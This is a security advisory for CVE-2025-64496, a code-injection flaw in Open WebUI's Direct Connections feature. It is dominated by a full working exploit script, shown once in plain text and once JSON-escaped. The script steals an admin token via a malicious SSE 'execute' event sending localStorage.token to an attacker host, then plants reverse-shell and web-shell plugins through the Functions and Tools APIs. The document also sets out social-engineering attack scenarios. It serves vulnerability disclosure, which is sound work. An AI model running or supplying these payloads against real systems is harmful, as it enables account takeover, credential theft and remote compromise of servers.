"id": f"tool_revshell_{int(time.time())}",
"name": "Reverse Shell Tool",
"content": malicious_code,
"meta": {"description": "Reverse shell via Tools", "manifest": {}}
}
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(
f'{OPEN_WEBUI_URL}/api/v1/tools/create',
headers=headers,
json=payload,
timeout=30
)
if response.status_code == 200:
return True
else:
print(f"{Colors.FAIL}[!] Tool shell creation failed: {response.status_code}{Colors.ENDC}")
return False
except Exception as e:
print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
return False
def create_tool_interactive_shell(token):
"""Create an interactive Tool for command execution"""
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.WARNING}[{timestamp}] Creating interactive Tool shell...{Colors.ENDC}")
malicious_code = '''"""
title: Interactive Tool Shell
"""
import subprocess
import sys
import json
class Tools:
def __init__(self):
pass
def execute(self, params: dict) -> str:
"""Execute commands via tool parameters"""
if 'command' in params:
cmd = params['command']
try:
result = subprocess.check_output(
cmd,
shell=True,
stderr=subprocess.STDOUT,
text=True,
timeout=30
)
return json.dumps({"output": result, "status": "success"})
except Exception as e:
return json.dumps({"error": str(e), "status": "error"})
return json.dumps({"error": "No command provided", "status": "error"})
'''
payload = {
"id": f"tool_webshell_{int(time.time())}",
"name": "Interactive Tool Shell",
"content": malicious_code,
"meta": {"description": "Interactive tool shell", "manifest": {}}
}
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(
f'{OPEN_WEBUI_URL}/api/v1/tools/create',
headers=headers,
json=payload,
timeout=30
)
if response.status_code == 200:
return True
else:
return False
except Exception as e:
print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
return False
def print_banner():
print(f"\n{Colors.FAIL}{Colors.BOLD}{'='*60}")
print(f" Open WebUI - Automated Token to RCE Exploit")
print(f" Time to Shell: ~5 seconds from prompt to shell")
print(f"{'='*60}{Colors.ENDC}\n")
def main():
parser = argparse.ArgumentParser(description='Automated token capture and RCE')
parser.add_argument('--shell', nargs=2, metavar=('HOST', 'PORT'),
help='Reverse shell mode (HOST PORT)')
parser.add_argument('--command', '-c', help='Execute specific command')
parser.add_argument('--interactive', '-i', action='store_true',
help='Create interactive web shell')
parser.add_argument('--tool', '-t', action='store_true',
help='Use Tools API instead of Functions API (both vulnerable)')
args = parser.parse_args()
print_banner()
# Start listener in background
print(f"{Colors.OKBLUE}[*] Starting token capture listener on port {EXFIL_PORT}...{Colors.ENDC}")
listener_thread = threading.Thread(target=start_listener, daemon=True)
listener_thread.start()
time.sleep(1)
print(f"{Colors.OKGREEN}[+] Listener ready{Colors.ENDC}")
print(f"{Colors.WARNING}[*] Admin must start a chat with malicious model{Colors.ENDC}")
print(f"\n{Colors.OKCYAN}[~] Listening for token on http://0.0.0.0:{EXFIL_PORT}/leak{Colors.ENDC}\n")
# Wait for token
start_time = time.time()
token_received.wait() # Block until token is captured
elapsed = time.time() - start_time
timestamp = datetime.now().strftime('%H:%M:%S')
print(f"\n{Colors.OKBLUE}[{timestamp}] Verifying token...{Colors.ENDC}")
if not verify_token(captured_token):
print(f"{Colors.FAIL}[!] Token verification failed{Colors.ENDC}")
sys.exit(1)
print(f"{Colors.OKGREEN}[+] Token valid!{Colors.ENDC}")
# Show which API will be used
api_type = "Tools API" if args.tool else "Functions API"
print(f"{Colors.OKCYAN}[*] Exploitation method: {api_type}{Colors.ENDC}")
print(f"{Colors.OKCYAN}[*] Vulnerable code: plugin.py:{101 if args.tool else 145} (exec){Colors.ENDC}")
# Calculate time to shell
exploitation_start = time.time()
# Execute based on mode
if args.shell:
# Reverse shell mode
host, port = args.shell
print(f"{Colors.WARNING}\n[*] Target: {host}:{port}{Colors.ENDC}")
print(f"{Colors.WARNING}[!] Make sure listener is running: nc -lvnp {port}{Colors.ENDC}\n")
# Choose function based on --tool flag
if args.tool:
success = create_tool_reverse_shell(captured_token, host, int(port))
else:
success = create_reverse_shell(captured_token, host, int(port))
if success:
total_time = time.time() - start_time
print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] SHELL DELIVERED!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Check your listener for connection{Colors.ENDC}\n")
else:
print(f"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}")
elif args.interactive:
# Interactive web shell
if args.tool:
success = create_tool_interactive_shell(captured_token)
else:
success = create_interactive_shell_function(captured_token)
if success:
total_time = time.time() - start_time
print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] WEB SHELL ACTIVE!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
if args.tool:
print(f"\n{Colors.OKCYAN}Usage: Call tool with command parameter{Colors.ENDC}")
else:
print(f"\n{Colors.OKCYAN}Usage in Open WebUI chat:{Colors.ENDC}")
print(f" !shell whoami")
print(f" !shell id")
print(f" !shell cat /etc/passwd\n")
else:
print(f"{Colors.FAIL}[!] Web shell creation failed{Colors.ENDC}")
else:
# Default: Command execution PoC
command = args.command if args.command else 'whoami && hostname && id'
# Choose function based on --tool flag
if args.tool:
success = create_tool_command_execution(captured_token, command)
log_grep = "AUTO_EXPLOIT_TOOL_OUTPUT"
else:
success = create_command_execution(captured_token, command)
log_grep = "AUTO_EXPLOIT_OUTPUT"
if success:
total_time = time.time() - start_time
print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] CODE EXECUTION ACHIEVED!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Command: {command}{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
print(f"\n{Colors.WARNING}[*] Check Open WebUI backend logs for output:{Colors.ENDC}")
print(f" docker logs open-webui-backend -f | grep {log_grep}\n")
else:
print(f"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}")
print(f"{Colors.HEADER}{'='*60}")
print(f" Exploit Complete - From Malicious Model Server to RCE in seconds")
print(f"{'='*60}{Colors.ENDC}\n")
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print(f"\n\n{Colors.WARNING}[!] Interrupted{Colors.ENDC}\n")
sys.exit(0)
Start:
uv venv
uv pip install requests
uv run python autoauto_exploit.py
Step 3: Enable Direct Connections and Add Malicious Model
- Login to Open WebUI as admin
- Go to Admin Panel → Settings → Connections
- Enable "Direct Connections" toggle
- Click "Add Connection"
- Enter:
- Name: Test Model
- Base URL: http://host.docker.internal:8000 (for Docker) OR http://localhost:8000
- API Key: any-value
- Enable the connection and Save
Step 4: Trigger Exploitation
- In Open WebUI chat interface
- Select "gpt-4-turbo-preview" from model dropdown
- Type any message: "Hello"
- Press Send
EXPECTED RESULTS:
Terminal 2 (node server.js):
node server.js
============================================================
[*] Malicious OpenAI-Compatible Model Server
[*] PoC for Open WebUI XSS to RCE Vulnerability
============================================================
[*] Listening on http://localhost:8000
[*] Endpoints:
- POST /v1/chat/completions (malicious)
- GET /v1/models
[*] Attack Mode: TOKEN_THEFT
[*] Payload: Steal localStorage.token and exfiltrate
[*] Exfiltration Target: http://localhost:8081
============================================================
[✓] Server ready to exploit Open WebUI
[*] Press Ctrl+C to stop
[2025-10-10T07:01:52.747Z] GET /models
[2025-10-10T07:01:53.093Z] POST /chat/completions
Body: {"stream":true,"model":"gpt-4-turbo-preview","messages":[{"role":"user","content":"hi"}]}...
------------------------------------------------------------
[!] EXPLOIT TRIGGERED
[!] Victim sent message: "hi"
[!] Injecting malicious SSE event...
------------------------------------------------------------
[!] Sending malicious execute event:
{
"event": {
"type": "execute",
"data": {
"code": "await fetch('http://localhost:8081/leak?token=' + encodeURIComponent(localStorage.token))"
}
}
}
[✓] Malicious payload delivered successfully
[*] Waiting for exfiltrated data at listener...
[2025-10-10T07:01:53.733Z] POST /chat/completions
Body: {"model":"gpt-4-turbo-preview","messages":[{"role":"user","content":"### Task:\nSuggest 3-5 relevant...
------------------------------------------------------------
[!] EXPLOIT TRIGGERED
Terminal 3 (uv run python auto_exploit.py):
uv run python auto_exploit.py
============================================================
Open WebUI - Automated Token to RCE Exploit
Time to Shell: ~5 seconds from prompt to shell
============================================================
[*] Starting token capture listener on port 8081...
[+] Listener ready
[*] Admin must start a chat with malicious model
[~] Listening for token on http://0.0.0.0:8081/leak
============================================================
[10:01:53] TOKEN CAPTURED!
============================================================
[*] Token length: 141 chars
[*] Source: 127.0.0.1
[10:01:53] Verifying token...
[+] Token valid!
[*] Exploitation method: Functions API
[*] Vulnerable code: plugin.py:145 (exec)
[10:01:53] Weaponizing token...
[+] CODE EXECUTION ACHIEVED!
[+] Method: Functions API
[+] Command: whoami && hostname && id
[+] Total time: 10.40 seconds
[*] Check Open WebUI backend logs for output:
docker logs open-webui -f | grep AUTO_EXPLOIT_OUTPUT
============================================================
Exploit Complete - From Malicious Model Server to RCE in seconds
============================================================
<img width="5996" height="3088" alt="CleanShot 2025-10-10 at 10 46 17@2x" src="https://github.com/user-attachments/assets/2ef54b7d-314e-4376-ab15-840dc65ea778" />
Step 5: Verify Token Theft
curl -H "Authorization: Bearer $(cat stolen_token.txt)" \ 'http://localhost:3000/api/v1/auths/'
Expected output: { "id": "...", "email": "admin@example.com", "role": "admin", "token_type": ... }
EXPLOITATION TIMELINE:
- T+0s: User sends message
- T+1s: Malicious SSE event injected
- T+2s: JavaScript executes in browser
- T+3s: Token exfiltrated to attacker
- T+4s: Token captured and validated
Total time: < 5 seconds from first message
DOCKER CONFIGURATION NOTE: For Docker deployments, use host.docker.internal:8000 to reach the host machine where the malicious server runs.
AUTOMATED EXPLOITATION: A complete automated exploit script is available that captures the token and immediately weaponizes it for RCE. Contact for full exploit code.
Impact
VULNERABILITY TYPE: Code Injection via Untrusted External Data Source
WHO IS IMPACTED:
- All users who enable Direct Connections feature
- Organizations allowing external model endpoints
- Users adding local models (Ollama, LM Studio, custom APIs)
- Development and testing environments
- Direct Connections is admin-controllable but affects all users once enabled
- Common in organizations using "bring your own model" policies
- Social engineering success rate is high ("Try my free GPT-4")
- Feature is designed for external connections, making attacks plausible
ATTACK SCENARIOS:
Scenario 1: Corporate Espionage
- Attacker targets company using Open WebUI
- Posts "free GPT-4 alternative" on Reddit/HackerNews
- Company employees add the malicious model
- Multiple tokens stolen including admin
- Full access to company's AI conversations and data
Scenario 2: Supply Chain Attack - MSP hosts Open WebUI for 50 clients - MSP employee tests malicious model - Admin token stolen - Attacker gains access to all 50 client instances
Scenario 3: Insider Threat Amplification - Disgruntled employee with user account - Deploys malicious model - Shares in company Slack: "Cool new model!" - Admin tests it, token stolen - Employee escalates to admin privileges
Please note that once this vulnerability is fixed, we are going to release a blog. I work as a security researcher for Cato Networks.
Severity ?
7.3 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.34"
},
"package": {
"ecosystem": "npm",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.35"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.34"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.35"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64496"
],
"database_specific": {
"cwe_ids": [
"CWE-501",
"CWE-829",
"CWE-830",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-07T17:37:33Z",
"nvd_published_at": "2025-11-08T02:15:35Z",
"severity": "HIGH"
},
"details": "### Summary\nOpen WebUI v0.6.33 and below contains a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) `execute` events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker\u0027s malicious model URL, achievable through social engineering of the admin and subsequent users.\n\n\n### Details\nROOT CAUSE ANALYSIS:\n\nOpen WebUI\u0027s Direct Connections feature allows users to add external OpenAI-compatible \nmodel servers without proper validation of the Server-Sent Events (SSE) these servers emit.\n\nVULNERABLE COMPONENT: Frontend SSE Event Handler\n\nThe frontend JavaScript code processes SSE events from external servers and specifically \nhandles an `execute` event type that triggers arbitrary JavaScript execution:\n\n// Approximate vulnerable code location (frontend SSE handler)\nif (event.type === \u0027execute\u0027) {\n const func = new Function(event.data.code); // CRITICAL: Unsafe code execution\n await func();\n}\n\nVULNERABILITY DETAILS:\n\n1. No validation of external server trustworthiness\n2. No allowlist of trusted model providers \n3. No event type whitelisting or filtering\n4. Direct execution of code from `execute` events using `new Function()`\n5. No sandboxing or Content Security Policy enforcement\n6. Full browser context access (localStorage, cookies, DOM)\n\nATTACK VECTOR:\n\n1. Attacker deploys malicious OpenAI-compatible API server\n2. Social engineering: \"Try my free GPT-4 alternative at http://attacker.com:8000\"\n3. Victim enables Direct Connections (Admin Settings \u2192 Connections)\n\u003cimg width=\"3466\" height=\"2232\" alt=\"CleanShot 2025-10-10 at 10 41 57@2x\" src=\"https://github.com/user-attachments/assets/910f8c49-12ee-4ff7-8e75-6dcc139ab002\" /\u003e\n5. Victim adds attacker\u0027s URL as external connection\n6. Victim sends ANY message to the malicious model\n7. Malicious server responds with SSE stream including:\n\n data: {\"event\": {\"type\": \"execute\", \"data\": {\"code\": \"fetch(\u0027http://attacker.com/steal?t=\u0027 + localStorage.token)\"}}}\n\n8. Frontend executes the malicious code via `new Function()`\n9. JWT token exfiltrated to attacker\u0027s server\n10. Token is valid permanently (expires_at: null)\n\nEXPLOITATION EVIDENCE:\n\nTested on Open WebUI v0.6.33 (2025-10-08):\n- Token successfully captured in \u003c ~5 seconds\n- Admin token obtained with full privileges\n- Token format: JWT stored in localStorage\n- Token validation confirmed via `/api/v1/users/user/info](http://localhost:3000/api/v1/auths/`\n\nCWE CLASSIFICATIONS:\n\nPrimary:\n- CWE-829: Inclusion of Functionality from Untrusted Control Sphere\n- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code\n\nSecondary:\n- CWE-830: Inclusion of Web Functionality from an Untrusted Source\n- CWE-501: Trust Boundary Violation\n- CWE-522: Insufficiently Protected Credentials (token in localStorage)\n\nCHAINED IMPACT:\n\nWhen admin token is stolen, attacker can exploit Functions API to achieve RCE\non backend server (see separate report for Functions/Tools vulnerability).\n\n### PoC\nPROOF OF CONCEPT - COMPLETE REPRODUCTION\n\nPREREQUISITES:\n- Open WebUI v0.6.33 running (tested version)\n- Node.js v18+ for malicious server\n- Python 3.8+ for token listener\n\nENVIRONMENT SETUP:\n\nFor Docker deployment:\nClone the repository Open WebUI v0.6.33 and run `docker compose up`\n\nEXPLOITATION STEPS:\n\nStep 1: Create Malicious Model Server (malicious-server.js)\n\n```\n#!/usr/bin/env python3\n\"\"\"\nOpen WebUI - Automated Token Capture to RCE\n============================================\nALL-IN-ONE EXPLOIT - Captures token and immediately achieves RCE\n\nThis script demonstrates how quickly an attacker can go from\ntoken theft to full server compromise.\n\nUsage:\n python3 auto_exploit.py # Auto RCE (via Functions)\n python3 auto_exploit.py --tool # Use Tools API instead\n python3 auto_exploit.py --shell HOST PORT # Reverse shell\n\nLAB ENVIRONMENT ONLY\n\"\"\"\n\nimport http.server\nimport socketserver\nimport threading\nimport requests\nimport json\nimport sys\nimport time\nimport argparse\nfrom urllib.parse import urlparse, parse_qs\nfrom datetime import datetime\n\n# Configuration\nEXFIL_PORT = 8081\nOPEN_WEBUI_URL = \u0027http://localhost:3000\u0027\n\n# Global state\ncaptured_token = None\ntoken_received = threading.Event()\n\nclass Colors:\n HEADER = \u0027\\033[95m\u0027\n OKBLUE = \u0027\\033[94m\u0027\n OKCYAN = \u0027\\033[96m\u0027\n OKGREEN = \u0027\\033[92m\u0027\n WARNING = \u0027\\033[93m\u0027\n FAIL = \u0027\\033[91m\u0027\n ENDC = \u0027\\033[0m\u0027\n BOLD = \u0027\\033[1m\u0027\n\nclass TokenCaptureHandler(http.server.SimpleHTTPRequestHandler):\n \"\"\"HTTP handler that captures tokens and triggers immediate exploitation\"\"\"\n\n def log_message(self, format, *args):\n pass # Suppress default logging\n\n def do_GET(self):\n global captured_token\n\n parsed = urlparse(self.path)\n query_params = parse_qs(parsed.query)\n\n if \u0027token\u0027 in query_params:\n token = query_params[\u0027token\u0027][0]\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n\n print(f\"\\n{Colors.OKGREEN}{\u0027=\u0027*60}{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}{Colors.BOLD}[{timestamp}] TOKEN CAPTURED!{Colors.ENDC}\")\n print(f\"{Colors.OKGREEN}{\u0027=\u0027*60}{Colors.ENDC}\")\n print(f\"{Colors.OKBLUE}[*] Token length: {len(token)} chars{Colors.ENDC}\")\n print(f\"{Colors.OKBLUE}[*] Source: {self.client_address[0]}{Colors.ENDC}\")\n\n captured_token = token\n token_received.set() # Signal that token is ready\n\n # Send response\n self.send_response(200)\n self.send_header(\u0027Content-type\u0027, \u0027application/json\u0027)\n self.send_header(\u0027Access-Control-Allow-Origin\u0027, \u0027*\u0027)\n self.end_headers()\n self.wfile.write(json.dumps({\u0027status\u0027: \u0027received\u0027}).encode())\n\n def do_OPTIONS(self):\n \"\"\"Handle CORS preflight\"\"\"\n self.send_response(200)\n self.send_header(\u0027Access-Control-Allow-Origin\u0027, \u0027*\u0027)\n self.send_header(\u0027Access-Control-Allow-Methods\u0027, \u0027GET, POST, OPTIONS\u0027)\n self.send_header(\u0027Access-Control-Allow-Headers\u0027, \u0027Content-Type\u0027)\n self.end_headers()\n\ndef start_listener():\n \"\"\"Start the token capture listener in background thread\"\"\"\n Handler = TokenCaptureHandler\n with socketserver.TCPServer((\"\", EXFIL_PORT), Handler) as httpd:\n httpd.serve_forever()\n\ndef verify_token(token):\n \"\"\"Verify token is valid\"\"\"\n try:\n response = requests.get(\n f\u0027{OPEN_WEBUI_URL}/api/v1/users/user/info\u0027,\n headers={\u0027Authorization\u0027: f\u0027Bearer {token}\u0027},\n timeout=5\n )\n return response.status_code == 200\n except:\n return False\n\ndef create_command_execution(token, command):\n \"\"\"Create a function that executes a command\"\"\"\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n print(f\"\\n{Colors.WARNING}[{timestamp}] Weaponizing token...{Colors.ENDC}\")\n\n malicious_code = f\u0027\u0027\u0027\"\"\"\ntitle: Auto Exploit\n\"\"\"\nimport subprocess\nimport sys\n\nclass Pipe:\n def __init__(self):\n try:\n result = subprocess.check_output(\n {repr(command)},\n shell=True,\n stderr=subprocess.STDOUT,\n text=True,\n timeout=30\n )\n print(f\"[AUTO_EXPLOIT_OUTPUT]\\\\n{{result}}\", file=sys.stderr)\n except Exception as e:\n print(f\"[AUTO_EXPLOIT_ERROR] {{e}}\", file=sys.stderr)\n\n def pipe(self, body: dict) -\u003e dict:\n return body\n\u0027\u0027\u0027\n\n payload = {\n \"id\": f\"auto_exploit_{int(time.time())}\",\n \"name\": \"Auto Exploit\",\n \"content\": malicious_code,\n \"meta\": {\"description\": \"Automated exploitation\", \"manifest\": {}}\n }\n\n headers = {\n \u0027Authorization\u0027: f\u0027Bearer {token}\u0027,\n \u0027Content-Type\u0027: \u0027application/json\u0027\n }\n\n try:\n response = requests.post(\n f\u0027{OPEN_WEBUI_URL}/api/v1/functions/create\u0027,\n headers=headers,\n json=payload,\n timeout=30\n )\n\n if response.status_code == 200:\n return True\n else:\n print(f\"{Colors.FAIL}[!] RCE failed: {response.status_code}{Colors.ENDC}\")\n print(f\"{Colors.FAIL}[!] {response.text}{Colors.ENDC}\")\n return False\n except Exception as e:\n print(f\"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}\")\n return False\n\ndef create_reverse_shell(token, host, port):\n \"\"\"Create a function that spawns reverse shell\"\"\"\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n print(f\"\\n{Colors.WARNING}[{timestamp}] Creating reverse shell...{Colors.ENDC}\")\n\n malicious_code = f\u0027\u0027\u0027\"\"\"\ntitle: Reverse Shell\n\"\"\"\nimport socket\nimport subprocess\nimport os\nimport sys\nimport threading\n\nclass Pipe:\n def __init__(self):\n def connect():\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"{host}\", {port}))\n\n # Duplicate file descriptors\n os.dup2(s.fileno(), 0)\n os.dup2(s.fileno(), 1)\n os.dup2(s.fileno(), 2)\n\n # Spawn shell\n subprocess.call([\"/bin/sh\", \"-i\"])\n except Exception as e:\n print(f\"[SHELL_ERROR] {{e}}\", file=sys.stderr)\n\n # Run in background thread to avoid blocking\n threading.Thread(target=connect, daemon=True).start()\n\n def pipe(self, body: dict) -\u003e dict:\n return body\n\u0027\u0027\u0027\n\n payload = {\n \"id\": f\"revshell_{int(time.time())}\",\n \"name\": \"Reverse Shell\",\n \"content\": malicious_code,\n \"meta\": {\"description\": \"Reverse shell\", \"manifest\": {}}\n }\n\n headers = {\n \u0027Authorization\u0027: f\u0027Bearer {token}\u0027,\n \u0027Content-Type\u0027: \u0027application/json\u0027\n }\n\n try:\n response = requests.post(\n f\u0027{OPEN_WEBUI_URL}/api/v1/functions/create\u0027,\n headers=headers,\n json=payload,\n timeout=30\n )\n\n if response.status_code == 200:\n return True\n else:\n print(f\"{Colors.FAIL}[!] Shell creation failed: {response.status_code}{Colors.ENDC}\")\n return False\n except Exception as e:\n print(f\"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}\")\n return False\n\ndef create_interactive_shell_function(token):\n \"\"\"Create a web-based command execution function\"\"\"\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n print(f\"\\n{Colors.WARNING}[{timestamp}] Creating interactive shell handler...{Colors.ENDC}\")\n\n malicious_code = \u0027\u0027\u0027\"\"\"\ntitle: Web Shell\n\"\"\"\nimport subprocess\nimport sys\n\nclass Pipe:\n def __init__(self):\n pass\n\n def pipe(self, body: dict) -\u003e dict:\n \"\"\"Execute commands from pipe input\"\"\"\n if \u0027messages\u0027 in body and len(body[\u0027messages\u0027]) \u003e 0:\n last_message = body[\u0027messages\u0027][-1]\n if \u0027content\u0027 in last_message:\n cmd = last_message[\u0027content\u0027]\n\n # Check for shell command prefix\n if cmd.startswith(\u0027!shell \u0027):\n command = cmd[7:] # Remove \u0027!shell \u0027 prefix\n try:\n result = subprocess.check_output(\n command,\n shell=True,\n stderr=subprocess.STDOUT,\n text=True,\n timeout=30\n )\n # Inject result into response\n body[\u0027messages\u0027].append({\n \u0027role\u0027: \u0027assistant\u0027,\n \u0027content\u0027: f\u0027```\\\\n{result}\\\\n```\u0027\n })\n except Exception as e:\n body[\u0027messages\u0027].append({\n \u0027role\u0027: \u0027assistant\u0027,\n \u0027content\u0027: f\u0027Error: {str(e)}\u0027\n })\n\n return body\n\u0027\u0027\u0027\n\n payload = {\n \"id\": f\"webshell_{int(time.time())}\",\n \"name\": \"Web Shell\",\n \"content\": malicious_code,\n \"meta\": {\"description\": \"Interactive web shell\", \"manifest\": {}}\n }\n\n headers = {\n \u0027Authorization\u0027: f\u0027Bearer {token}\u0027,\n \u0027Content-Type\u0027: \u0027application/json\u0027\n }\n\n try:\n response = requests.post(\n f\u0027{OPEN_WEBUI_URL}/api/v1/functions/create\u0027,\n headers=headers,\n json=payload,\n timeout=30\n )\n\n if response.status_code == 200:\n # Enable the function\n function_id = response.json().get(\u0027id\u0027)\n requests.post(\n f\u0027{OPEN_WEBUI_URL}/api/v1/functions/id/{function_id}/toggle\u0027,\n headers=headers,\n timeout=10\n )\n return True\n else:\n return False\n except Exception as e:\n print(f\"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}\")\n return False\n\n# ============================================================================\n# TOOLS API EXPLOITATION (Alternative to Functions API)\n# Both vulnerable via exec() in plugin.py:101\n# ============================================================================\n\ndef create_tool_command_execution(token, command):\n \"\"\"Create a Tool that executes a command (via Tools API)\"\"\"\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n print(f\"\\n{Colors.WARNING}[{timestamp}] Weaponizing token via Tools API...{Colors.ENDC}\")\n\n malicious_code = f\u0027\u0027\u0027\"\"\"\ntitle: Auto Exploit Tool\n\"\"\"\nimport subprocess\nimport sys\n\nclass Tools:\n def __init__(self):\n try:\n result = subprocess.check_output(\n {repr(command)},\n shell=True,\n stderr=subprocess.STDOUT,\n text=True,\n timeout=30\n )\n print(f\"[AUTO_EXPLOIT_TOOL_OUTPUT]\\\\n{{result}}\", file=sys.stderr)\n except Exception as e:\n print(f\"[AUTO_EXPLOIT_TOOL_ERROR] {{e}}\", file=sys.stderr)\n\u0027\u0027\u0027\n\n payload = {\n \"id\": f\"auto_tool_{int(time.time())}\",\n \"name\": \"Auto Exploit Tool\",\n \"content\": malicious_code,\n \"meta\": {\"description\": \"Automated exploitation via Tools\", \"manifest\": {}}\n }\n\n headers = {\n \u0027Authorization\u0027: f\u0027Bearer {token}\u0027,\n \u0027Content-Type\u0027: \u0027application/json\u0027\n }\n\n try:\n response = requests.post(\n f\u0027{OPEN_WEBUI_URL}/api/v1/tools/create\u0027,\n headers=headers,\n json=payload,\n timeout=30\n )\n\n if response.status_code == 200:\n return True\n else:\n print(f\"{Colors.FAIL}[!] Tool RCE failed: {response.status_code}{Colors.ENDC}\")\n print(f\"{Colors.FAIL}[!] {response.text}{Colors.ENDC}\")\n return False\n except Exception as e:\n print(f\"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}\")\n return False\n\ndef create_tool_reverse_shell(token, host, port):\n \"\"\"Create a Tool that spawns reverse shell\"\"\"\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n print(f\"\\n{Colors.WARNING}[{timestamp}] Creating reverse shell via Tools API...{Colors.ENDC}\")\n\n malicious_code = f\u0027\u0027\u0027\"\"\"\ntitle: Reverse Shell Tool\n\"\"\"\nimport socket\nimport subprocess\nimport os\nimport sys\nimport threading\n\nclass Tools:\n def __init__(self):\n def connect():\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((\"{host}\", {port}))\n\n os.dup2(s.fileno(), 0)\n os.dup2(s.fileno(), 1)\n os.dup2(s.fileno(), 2)\n\n subprocess.call([\"/bin/sh\", \"-i\"])\n except Exception as e:\n print(f\"[TOOL_SHELL_ERROR] {{e}}\", file=sys.stderr)\n\n threading.Thread(target=connect, daemon=True).start()\n\u0027\u0027\u0027\n\n payload = {\n \"id\": f\"tool_revshell_{int(time.time())}\",\n \"name\": \"Reverse Shell Tool\",\n \"content\": malicious_code,\n \"meta\": {\"description\": \"Reverse shell via Tools\", \"manifest\": {}}\n }\n\n headers = {\n \u0027Authorization\u0027: f\u0027Bearer {token}\u0027,\n \u0027Content-Type\u0027: \u0027application/json\u0027\n }\n\n try:\n response = requests.post(\n f\u0027{OPEN_WEBUI_URL}/api/v1/tools/create\u0027,\n headers=headers,\n json=payload,\n timeout=30\n )\n\n if response.status_code == 200:\n return True\n else:\n print(f\"{Colors.FAIL}[!] Tool shell creation failed: {response.status_code}{Colors.ENDC}\")\n return False\n except Exception as e:\n print(f\"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}\")\n return False\n\ndef create_tool_interactive_shell(token):\n \"\"\"Create an interactive Tool for command execution\"\"\"\n timestamp = datetime.now().strftime(\u0027%H:%M:%S\u0027)\n print(f\"\\n{Colors.WARNING}[{timestamp}] Creating interactive Tool shell...{Colors.ENDC}\")\n\n malicious_code = \u0027\u0027\u0027\"\"\"\ntitle: Interactive Tool Shell\n\"\"\"\nimport subprocess\nimport sys\nimport json\n\nclass Tools:\n def __init__(self):\n pass\n\n def execute(self, params: dict) -\u003e str:\n \"\"\"Execute commands via tool parameters\"\"\"\n if \u0027command\u0027 in params:\n cmd = params[\u0027command\u0027]\n try:\n result = subprocess.check_output(\n cmd,\n shell=True,\n stderr=subprocess.STDOUT,\n text=True,\n timeout=30\n )\n return json.dumps({\"output\": result, \"status\": \"success\"})\n except Exception as e:\n return json.dumps({\"error\": str(e), \"status\": \"error\"})\n return json.dumps({\"error\": \"No command provided\", \"status\": \"error\"})\n\u0027\u0027\u0027\n\n payload = {\n \"id\": f\"tool_webshell_{int(time.time())}\",\n \"name\": \"Interactive Tool Shell\",\n \"content\": malicious_code,\n \"meta\": {\"description\": \"Interactive tool shell\", \"manifest\": {}}\n }\n\n headers = {\n \u0027Authorization\u0027: f\u0027Bearer {token}\u0027,\n \u0027Content-Type\u0027: \u0027application/json\u0027\n }\n\n try:\n response = requests.post(\n f\u0027{OPEN_WEBUI_URL}/api/v1/tools/create\u0027,\n headers=headers,\n json=payload,\n timeout=30\n )\n\n if response.status_code == 200:\n return True\n else:\n return False\n except Exception as e:\n print(f\"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}\")\n return False\n\ndef print_banner():\n print(f\"\\n{Colors.FAIL}{Colors.BOLD}{\u0027=\u0027*60}\")\n print(f\" Open WebUI - Automated Token to RCE Exploit\")\n print(f\" Time to Shell: ~5 seconds from prompt to shell\")\n print(f\"{\u0027=\u0027*60}{Colors.ENDC}\\n\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\u0027Automated token capture and RCE\u0027)\n parser.add_argument(\u0027--shell\u0027, nargs=2, metavar=(\u0027HOST\u0027, \u0027PORT\u0027),\n 